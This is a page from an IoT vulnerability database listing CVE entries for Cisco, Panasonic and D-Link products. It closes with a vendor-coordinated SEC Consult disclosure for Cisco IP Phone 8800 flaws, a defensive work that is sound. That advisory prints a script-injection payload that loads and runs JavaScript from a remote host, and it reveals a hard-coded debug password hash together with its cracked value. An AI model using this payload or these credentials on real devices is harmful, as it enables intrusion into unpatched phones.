VARIoT IoT vulnerabilities database
| VAR-201901-0589 | CVE-2018-15457 | Cisco Prime Infrastructure Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Prime Infrastructure could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected system. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected system. An attacker could exploit this vulnerability by persuading a user of the interface to click a maliciously crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco Prime Infrastructure Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCvm74707
| VAR-201901-0601 | CVE-2018-15440 | Cisco Identity Services Engine Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web interface of an affected system. The vulnerability is due to insufficient sanitization of user-supplied data that is written to log files and displayed in certain web pages of the web-based management interface of an affected device. An attacker could exploit this vulnerability by convincing a user of the interface to click a specific link or view an affected log file. The injected script code may be executed in the context of the web-based management interface or allow the attacker to access sensitive browser-based information.
An attacker can exploit these vulnerabilities to execute arbitrary HTML script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or perform unauthorized actions. Other attacks are also possible.
This issue being tracked by Cisco Bug ID's CSCvm71860 and CSCvm79609. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies
| VAR-201901-0597 | CVE-2018-15467 | Cisco TelePresence Management Suite Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco TelePresence Management Suite (TMS) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCvm03461
| VAR-201901-0590 | CVE-2018-15458 | Cisco Firepower Management Center Resource management vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the Shell Access Filter feature of Cisco Firepower Management Center (FMC), when used in conjunction with remote authentication, could allow an unauthenticated, remote attacker to cause high disk utilization, resulting in a denial of service (DoS) condition. The vulnerability occurs because the configuration of the Shell Access Filter, when used with a specific type of remote authentication, can cause a system file to have unbounded writes. An attacker could exploit this vulnerability by sending a steady stream of remote authentication requests to the appliance when the specific configuration is applied. Successful exploitation could allow the attacker to increase the size of a system log file so that it consumes most of the disk space. The lack of available disk space could lead to a DoS condition in which the device functions could operate abnormally, making the device unstable. Cisco Firepower Management Center (FMC) Contains a resource management vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state.
Attackers can exploit this issue to cause a denial-of-service condition, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCvk20751
| VAR-201901-0593 | CVE-2018-15461 | Cisco Webex Business Suite Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the MyWebex component of Cisco Webex Business Suite could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack. The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by convincing a user to click a crafted URL. To exploit this vulnerability, the attacker may provide a link that directs a user to a malicious site and use misleading language or instructions to persuade the user to follow the provided link.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCvk29147. Cisco Webex Business Suite is a set of video conferencing solutions of Cisco (Cisco). MyWebex is one of the components that supports accessing remote computers from a browser
| VAR-201901-0473 | CVE-2018-0484 | Cisco IOS and Cisco IOS XE Access control vulnerability |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the access control logic of the Secure Shell (SSH) server of Cisco IOS and IOS XE Software may allow connections sourced from a virtual routing and forwarding (VRF) instance despite the absence of the vrf-also keyword in the access-class configuration. The vulnerability is due to a missing check in the SSH server. An attacker could use this vulnerability to open an SSH connection to an affected Cisco IOS or IOS XE device with a source address belonging to a VRF instance. Once connected, the attacker would still need to provide valid credentials to access the device. Cisco IOS and Cisco IOS XE Contains an access control vulnerability.Information may be tampered with.
Successful exploits may allow an attacker to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks.
This issue is being tracked by Cisco Bug ID CSCvk37852
| VAR-201901-0471 | CVE-2018-0482 | Cisco Prime Network Control System Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Prime Network Control System could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web interface of the affected system. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the web-based management interface or allow the attacker to access sensitive browser-based information. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCvj92813. The platform can be used to monitor and troubleshoot wired and wireless LANs
| VAR-201901-0468 | CVE-2018-0449 | Cisco Jabber Client Framework Permissions vulnerability |
CVSS V2: 3.3 CVSS V3: 4.2 Severity: MEDIUM |
A vulnerability in the Cisco Jabber Client Framework (JCF) software, installed as part of the Cisco Jabber for Mac client, could allow an authenticated, local attacker to corrupt arbitrary files on an affected device that has elevated privileges. The vulnerability exists due to insecure directory permissions set on a JCF created directory. An authenticated attacker with the ability to access an affected directory could create a hard link to an arbitrary location on the affected system. An attacker could convince another user that has administrative privileges to perform an install or update the Cisco Jabber for Mac client to perform such actions, allowing files to be created in an arbitrary location on the disk or an arbitrary file to be corrupted when it is appended to or overwritten.
A local attacker can exploit this issue to obtain sensitive information and perform unauthorized actions; this may aid in launching further attacks.
This issue is being tracked by Cisco Bug ID CSCvm60187. Cisco Jabber Client for Mac OS is a set of unified communication client programs based on the Mac OS platform of Cisco (Cisco). The program offers instant messaging, voice and video calling, and more. A local attacker could exploit this vulnerability to create or corrupt arbitrary files anywhere on the disk
| VAR-201901-0472 | CVE-2018-0483 | Cisco Jabber Client Framework Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
A vulnerability in Cisco Jabber Client Framework (JCF) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of an affected system. The vulnerability is due to insufficient validation of user-supplied input of an affected client. An attacker could exploit this vulnerability by executing arbitrary JavaScript in the Jabber client of the recipient. A successful exploit could allow the attacker to execute arbitrary script code in the context of the targeted client or allow the attacker to access sensitive client-based information. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCvm82721. The framework provides online status display, instant messaging, voice and other functions
| VAR-201901-0470 | CVE-2018-0474 | Cisco Unified Communications Manager Vulnerabilities in certificate and password management |
CVSS V2: 4.0 CVSS V3: 8.8 Severity: HIGH |
A vulnerability in the web-based management interface of Cisco Unified Communications Manager could allow an authenticated, remote attacker to view digest credentials in clear text. The vulnerability is due to the incorrect inclusion of saved passwords in configuration pages. An attacker could exploit this vulnerability by logging in to the Cisco Unified Communications Manager web-based management interface and viewing the source code for the configuration page. A successful exploit could allow the attacker to recover passwords and expose those accounts to further attack.
This issue is being tracked by Cisco Bug ID CSCvc21606. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution
| VAR-201901-0588 | CVE-2018-15456 | Cisco Identity Services Engine Vulnerable to information disclosure |
CVSS V2: 4.0 CVSS V3: 4.9 Severity: MEDIUM |
A vulnerability in the Admin Portal of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to view saved passwords in plain text. The vulnerability is due to the incorrect inclusion of saved passwords when loading configuration pages in the Admin Portal. An attacker with read or write access to the Admin Portal could exploit this vulnerability by browsing to a page that contains sensitive data. An exploit could allow the attacker to recover passwords for unauthorized use and expose those accounts to further attack. Cisco Identity Services Engine (ISE) Contains an information disclosure vulnerability.Information may be obtained. This may lead to further attacks.
This issue being tracked by Cisco Bug ID CSCvm63427, CSCvm91147, CSCvm91202. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies
| VAR-201901-0710 | CVE-2018-0282 | Cisco IOS and Cisco IOS XE Software state vulnerability |
CVSS V2: 7.1 CVSS V3: 6.8 Severity: MEDIUM |
A vulnerability in the TCP socket code of Cisco IOS and IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload. The vulnerability is due to a state condition between the socket state and the transmission control block (TCB) state. While this vulnerability potentially affects all TCP applications, the only affected application observed so far is the HTTP server. An attacker could exploit this vulnerability by sending specific HTTP requests at a sustained rate to a reachable IP address of the affected software. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition on an affected device. Cisco IOS and Cisco IOS XE The software contains a state vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state.
This issue is being tracked by Cisco Bug ID CSCvg39082
| VAR-201901-0726 | CVE-2018-0676 | Multiple vulnerabilities in Panasonic BN-SDWBP3 |
CVSS V2: 5.2 CVSS V3: 6.8 Severity: Medium |
BN-SDWBP3 firmware version 1.0.9 and earlier allows an attacker on the same network segment to bypass authentication to access to the management screen and execute an arbitrary command via unspecified vectors. BN-SDWBP3 provided by Panasonic Corporation is a Wi-Fi Reader/Writer for SD Memory Cards. BN-SDWBP3 contains multiple vulnerabilities listed below. * Improper Authentication (CWE-287) - CVE-2018-0676 * OS Command Injection(CWE-78) - CVE-2018-0677 * Buffer Overflow (CWE-119) - CVE-2018-0678 Taizoh Tsukamoto of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. - CVE-2018-0676 * A user on the same LAN who can access the product as an administrative privilege may execute an arbitrary OS command. - CVE-2018-0677 * A user on the same LAN who can access the product as an administrative privilege may execute an arbitrary code or perform a denial-of-service (DoS) attack. - CVE-2018-0678. An authorization issue vulnerability exists in Panasonic BN-SDWBP3 with firmware version 1.0.9 and earlier
| VAR-201901-0727 | CVE-2018-0677 | Multiple vulnerabilities in Panasonic BN-SDWBP3 |
CVSS V2: 5.2 CVSS V3: 6.8 Severity: Medium |
BN-SDWBP3 firmware version 1.0.9 and earlier allows attacker with administrator rights on the same network segment to execute arbitrary OS commands via unspecified vectors. BN-SDWBP3 provided by Panasonic Corporation is a Wi-Fi Reader/Writer for SD Memory Cards. BN-SDWBP3 contains multiple vulnerabilities listed below. * Improper Authentication (CWE-287) - CVE-2018-0676 * OS Command Injection(CWE-78) - CVE-2018-0677 * Buffer Overflow (CWE-119) - CVE-2018-0678 Taizoh Tsukamoto of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. * An attacker may access to the management screen and execute an arbitrary command. - CVE-2018-0676 * A user on the same LAN who can access the product as an administrative privilege may execute an arbitrary OS command. - CVE-2018-0677 * A user on the same LAN who can access the product as an administrative privilege may execute an arbitrary code or perform a denial-of-service (DoS) attack. - CVE-2018-0678. An operating system command injection vulnerability exists in Panasonic BN-SDWBP3 with firmware version 1.0.9 and earlier
| VAR-201901-0728 | CVE-2018-0678 | Multiple vulnerabilities in Panasonic BN-SDWBP3 |
CVSS V2: 5.2 CVSS V3: 6.8 Severity: Medium |
Buffer overflow in BN-SDWBP3 firmware version 1.0.9 and earlier allows an attacker on the same network segment to execute arbitrary code via unspecified vectors. BN-SDWBP3 provided by Panasonic Corporation is a Wi-Fi Reader/Writer for SD Memory Cards. BN-SDWBP3 contains multiple vulnerabilities listed below. * Improper Authentication (CWE-287) - CVE-2018-0676 * OS Command Injection(CWE-78) - CVE-2018-0677 * Buffer Overflow (CWE-119) - CVE-2018-0678 Taizoh Tsukamoto of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. * An attacker may access to the management screen and execute an arbitrary command. - CVE-2018-0676 * A user on the same LAN who can access the product as an administrative privilege may execute an arbitrary OS command. - CVE-2018-0677 * A user on the same LAN who can access the product as an administrative privilege may execute an arbitrary code or perform a denial-of-service (DoS) attack. - CVE-2018-0678
| VAR-201901-1554 | CVE-2018-20674 | plural D-Link Command injection vulnerability in product devices |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
plural D-Link Product devices contain a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-822C1 and others are all wireless router products of D-Link. A command execution vulnerability exists in several D-Link products that can be exploited by remote attackers to execute commands. D-Link DIR-822 C1, etc. The following products and versions are affected: D-Link DIR-822 C1 with firmware prior to v3.11B01Beta; DIR-822-US C1 with firmware prior to v3.11B01Beta; DIR-850L A with firmware prior to v1.21B08Beta *; DIR-850L B* with firmware prior to v2.22B03Beta; DIR-880L A* with firmware prior to v1.20B02Beta
| VAR-201901-1555 | CVE-2018-20675 | plural D-Link Authentication vulnerabilities in product devices |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
plural D-Link Product devices have authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-Link DIR-822 C1, etc. are all wireless router products of D-Link. A security vulnerability exists in several D-Link products. An attacker could exploit this vulnerability to bypass authentication. The following products and versions are affected: D-Link DIR-822 C1 with firmware prior to v3.11B01Beta; DIR-822-US C1 with firmware prior to v3.11B01Beta; DIR-850L A with firmware prior to v2.22B03Beta *; DIR-880L A* with firmware prior to v1.20B02Beta; DIR-850L B* with firmware prior to v2.22B03Beta
| VAR-201901-0595 | CVE-2018-15464 | Cisco 900 series Aggregation Services Router Vulnerable to resource exhaustion |
CVSS V2: 5.0 CVSS V3: 5.8 Severity: MEDIUM |
A vulnerability in Cisco 900 Series Aggregation Services Router (ASR) software could allow an unauthenticated, remote attacker to cause a partial denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient handling of certain broadcast packets ingress to the device. An attacker could exploit this vulnerability by sending large streams of broadcast packets to an affected device. If successful, an exploit could allow an attacker to impact services running on the device, resulting in a partial DoS condition.
This issue is being tracked by Cisco Bug ID CSCvh94635
| VAR-201901-0592 | CVE-2018-15460 | Cisco Email Security Appliances Input validation vulnerability |
CVSS V2: 7.8 CVSS V3: 8.6 Severity: HIGH |
A vulnerability in the email message filtering feature of Cisco AsyncOS Software for Cisco Email Security Appliances (ESA) could allow an unauthenticated, remote attacker to cause the CPU utilization to increase to 100 percent, causing a denial of service (DoS) condition on an affected device. The vulnerability is due to improper filtering of email messages that contain references to whitelisted URLs. An attacker could exploit this vulnerability by sending a malicious email message that contains a large number of whitelisted URLs. A successful exploit could allow the attacker to cause a sustained DoS condition that could force the affected device to stop scanning and forwarding email messages. CiscoEmailSecurityAppliance (ESA) is an email security appliance from Cisco. AsyncOSSoftware is the operating system used in it.
This issue is being tracked by Cisco Bug ID CSCvm81627
| VAR-201901-0469 | CVE-2018-0461 |
Cisco IP Phone 8800 Code Injection Vulnerability in Series Software
Related entries in the VARIoT exploits database: VAR-E-201901-0346 |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
A vulnerability in the Cisco IP Phone 8800 Series Software could allow an unauthenticated, remote attacker to conduct an arbitrary script injection attack on an affected device. The vulnerability exists because the software running on an affected device insufficiently validates user-supplied data. An attacker could exploit this vulnerability by persuading a user to click a malicious link provided to the user or through the interface of an affected device. A successful exploit could allow an attacker to execute arbitrary script code in the context of the user interface or access sensitive system-based information, which under normal circumstances should be prohibited. The Cisco IP Phone 8800 Series device is an IP phone that provides video and VoIP communication capabilities at Cisco.
This issue is tracked by Cisco Bug ID CSCvm95999. SEC Consult Vulnerability Lab Security Advisory < 20190109-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Cisco VoIP Phones, e.g. models 88XX
vulnerable version: See list of vulnerable devices/firmwares below
fixed version: 12.5.1 MN
CVE number: CVE-2018-0461
impact: high
homepage: https://www.cisco.com
found: 10/2018
by: W. Schober, IoT Inspector (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"The Cisco IP Phone 8800 Series is a great fit for businesses of all sizes
seeking secure, high-quality, full-featured VoIP. Select models provide
affordable entry to HD video and support for highly-active, in-campus mobile
workers."
Source:
https://www.cisco.com/c/en/us/products/collaboration-endpoints/unified-ip-phone-8800-series/index.html
Business recommendation:
------------------------
SEC Consult recommends to update the devices to the newest firmware (12.5.1 MN),
where all the documented issues are fixed according to the vendor.
We want to thank Cisco for the very professional response and great coordination.
Vulnerability overview/description:
-----------------------------------
1) Arbitrary Script Injection
The VOIP phones can be managed directly via the integrated keyboard and the
built-in screen. In the configuration menu a few spots allow users to input
text via the integrated keyboard into text boxes (e.g. Hostname). Those text
input fields are prone to JavaScript-like code injection. An attacker is able
to inject arbitrary payloads via the T9 keyboard.
2) Hard coded and weak secrets
(Identified during an automated firmware analysis by IoT Inspector)
The firmware, which is directly served from Cisco, contains multiple hard coded
password hashes. They are stored in the /etc/passwd file and are hashed using
an outdated algorithm (UNIX MD5+salt). The users are not documented anywhere.
Access via SSH using those credentials is possible.
Due to the outdated algorithm in use (UNIX MD5+Salt) and the very weak password
it was easily possible to brute-force the password within seconds.
3) Undocumented debug functionality
During a manual firmware analysis a few undocumented endpoints in the
built-in web application, which is running on the VOIP phone,
were identified. Those routes lead to parts of the web application that are
neither documented nor officially mentioned anywhere by Cisco. Those parts of
the web application allow an attacker to debug the device and create memory
dumps.
4) Various outdated components with known vulnerabilities
During the check a lot of outdated components were identified by their version
numbers. It is not known which patches got backported by the vendor but Cisco
mentioned that they have implemented some. The potentially affected components
are:
-) wpa_supplicant
-) BusyBox
-) Dnsmasq
-) OpenSSL
-) OpenSSH
-) Linux Kernel Privilege Escalation app_keya
-) Linux Kernel Privilege Escalation aMempodippera
-) Multiple Linux Kernel CVE entries
Please take a look at the IoT Inspector report for details:
https://r.sec-consult.com/iotinspectorcisco
Proof of concept:
-----------------
1) Arbitrary Script Injection
A lot of settings can be changed directly on the VOIP phone via the built-in
screen. There are also multiple locations, where user-input is parsed and
displayed. It was possible to inject arbitrary (JavaScript) code directly into
the phone UI. As an example the hostname of the VOIP Phone can be changed to
the following value:
hostnamea><img src=http://$IP/sec.js onload=exec()>
The sec.js gets loaded from the remote host immediately and the exec function
is executed.
< A screenshot can be found online on our website >
Further analysis has not been performed, but depending on the underlying
libraries/system in use, it might be possible to get system level access via
this attack vector.
2) Hard coded and weak secrets
The file at the following path contains a hard coded password for the user debug:
/_rootfs288xx.12-0-1ES-15.sbn.extracted/squashfs-root/etc/passwd
$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71 (Type: MD5 (Unix))
This hash corresponds to the following clear-text password: debug
The password for the user root and default is also stored in the /etc/passwd:
nCjlgBm7.lvX2 (Type: DES (Unix)) - Users: root, default
3) Undocumented debug functionality
The built-in VOIP phone web server offers multiple functionalities for the
end-user. During a manual analysis, undocumented endpoints with critical
functionality got identified. Assigned ID: PSIRT-0289060835
Cisco PSIRT requests that the public disclosure should be
shifted to January 2019 to avoid public christmas holidays.
2018-10-18: Contacting Cisco PSIRT and agreeing on public disclosure date
2019-01-09.
2018-10-24: Update from Cisco that a case owner got assigned.
2018-10-29: Update from Cisco that they are still reviewing the vulnerabilities
and that they have already requested CVEs.
2018-11-05: Update from Cisco with further details about the internal scheduling.
2018-11-12: Update from Cisco with further details about CVEs.
2018-11-12: Cisco assigned CVE-2018-0461 and informed us that the vulnerabilities
will be fixed in an upcoming release at the end of the year;
Requesting affected/fixed versions.
2018-11-30: Cisco responds with affected devices and firmwares. Requesting
updated firmware to do another IoT inspector scan, to verify the
fixes.
2019-01-09: Public release of security advisory
Solution:
---------
Update the firmware of the affected devices to at least 12.5.1 MN.
The vendor has published a security advisory as well:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-phone-script-injection
Workaround:
-----------
Disable the built-in web server
Segment the VOIP network in a way, that access for devices other
than VoIP phones in any direction is not possible at all.
Remove the debug user
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Schober / @2019